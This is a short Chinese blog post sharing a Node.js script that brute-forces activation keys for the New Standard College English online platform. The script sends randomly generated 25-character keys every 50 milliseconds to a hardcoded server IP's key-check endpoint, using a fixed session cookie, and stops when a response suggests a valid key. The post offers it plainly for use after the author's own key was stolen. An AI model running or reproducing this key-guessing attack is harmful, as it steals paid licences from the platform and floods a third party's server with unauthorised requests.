新标准大学英语验证码暴力破解

今天也是非常不爽……诸事不宜,于是就写了这么一个小的nodejs程序来暴力破解一下新标准大学英语的验证码(我的验证码好久之前被被人偷了(╯‵□′)╯︵┻━┻

什么都不说了,直接放代码。程序没有什么技术含量,只是nodejs的入门吧


var http = require('http');
var chars = 'ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz123456789';
var myKey;
var str;

var CallBack = function (res) {
    console.log("Got response: " + res.statusCode);
    //console.log('HEADERS: ' + JSON.stringify(res.headers));
    res.setEncoding('utf8');
    res.on('data', function (chunk) {
        str += chunk;
    });
    res.on('end', function () {
        //console.log("BODY:" + str);
        if(str!="")
        {
            process.exit();
        }
    });
}


function onErro(e) {
    console.log("Got error: " + e.message);
}


function loop()
{
    var i = 0;
    myKey = "";
    while(i<25)
    {
        myKey += chars.charAt(Math.floor(Math.random() * 39));
        i++;
    }
    var bound = "------WebKitFormBoundaryZeArSIUsGkdKWdAL\r\n";
    var data = bound + "Content-Disposition: form-data; name=\"whichAction\"\r\n\r\ncheckMyKey\r\n\r\n"
        + bound + "Content-Disposition: form-data; name=\"myKey\"\r\n\r\n" + myKey + "\r\n\r\n"
        + bound + "Content-Disposition: form-data; name=\"targetBookID\"\r\n\r\n40\r\n\r\n" + bound;
    var options = {
        hostname: '121.251.255.73',
        port: 80,
        path: '/login/zhuce/zhuceajax.php',
        method: 'POST',
        headers: {
            'Content-Length': data.length.toString(),
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZeArSIUsGkdKWdAL",
            'Cookie': 'Horizon=dd939bc0226f5394b94667c53d1d6fee',
            'Connection': 'close'
        },
    };
    str = "";
    setTimeout(loop, 50);
    var req = http.request(options, CallBack);

    req.on('error', onErro);
    req.write(data);

    console.log("Code:"+myKey);
    req.end()
}

loop();